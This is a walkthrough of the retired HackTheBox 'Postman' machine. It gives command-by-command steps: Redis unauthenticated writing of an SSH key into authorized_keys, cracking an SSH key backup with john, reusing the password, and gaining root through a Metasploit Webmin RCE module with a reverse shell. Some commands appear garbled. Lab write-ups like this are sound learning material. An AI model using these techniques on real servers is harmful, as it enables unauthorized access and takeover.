Postman is an easy marked box in HackTheBox, it just retired and here's my writeup!
First, let's add the hostname postman to the hosts file so that, we don't always need to type in the IP address.
Hit i (going to input mode)
:x (saving and exiting)
Now, let's run a nmap scan to see what services are running. We will be checking for all the ports, therefore the -p- option.
nmap -A -T4 -p- 10.10.10.160
SSL - 21 http - 80 Miniserv 1.910 - 10000 redis - 6379
Miniserv at port 10000, that's something that I haven't seen very often. Let's check if it has a webpage.
We can see a webmin login prompt, trying admin/admin there, doesn't give us anything and I don't think bruteforce is the name of the game here.
Now, the other interesting service available is redis, to check the redis port,
apt-get install redis-tools #installing redis command line tools redis-cli -h postman #connecting to the postman server via redis-cli ping #checking the connection pong #we get a pong back, that's nice
Now that we know that the connection works fine, let's quit it.
This version of redis has a common vulnerability. You can check it out at: https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
As suggested by packet storm security, let's try generating a rsa key and see if that works.
ssh-keygen -t rsa -C "redis@postman"
Create the private/public key pair and save them both at ~/HTB/Postman.
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
Now, let's upload the contents of the test.txt file to the redis server.
cat test.txt | redis-cli -h 10.10.10.160 -x set crackit
-x option tells redis-cli to read the last argument from STDIN, which is our case, is the content of test.txt.
redis-cli -h 10.10.10.160 config get dir config set dbfilename "authorized_keys" save quit
We saved the contents of our test.txt file as authorized_keys in the server.
Now, lets try to login with the private-public key pair.
ssh -i id_rsa firstname.lastname@example.org
You are in!
Got the initial foothold, now time for privesc!
cd /opt/ ls
ls there, you should see
That's interesting, we should checkout if it really is a backup of
id_rsa file, in which case, our job will be really easy.
Copy all of it and in another terminal window, in our attacking machine,
Again, Hit i and go to the input mode and paste everything there.
:x To save and exit.
Now, we will try to crack the password used with the rsa key.
updatedb locate ssh2john.py #finds where ssh2john.py file is cp $(locate ssh2john.py) . #copies the ssh2john.py file from wherever it is to the present working directory python ssh2john.py id_rsa.bak > id_rsa.bak.hash #converts it to a john usable format john id_rsa.bak.hash -wordlist=rockyou.txt #using the rockyou.txt file and john, we try to crack the password
You should get a password, "computer2008".
However, when you try to ssh in, you will be denied.
Now, go back to the window where you are logged in as redis user.
Give the password as, computer2008
You are user now!
cd ~ cat user.txt
Now, go to the browser and try to login to the webmin using Matt's credentials (notice that it is Matt and not matt).
So, that works.
Now, logout as Matt user from the terminal and webmin.
Back in your kali machine,
msfconsole search webmin use linux/http/webmin_packageup_rce options set rhosts postman set password computer2008 set username Matt set ssl true set lhost <your kali machine's ip> exploit
And that should work!
Congratulations, you're root now!
Thank you for reading, feel free to share it if you like it!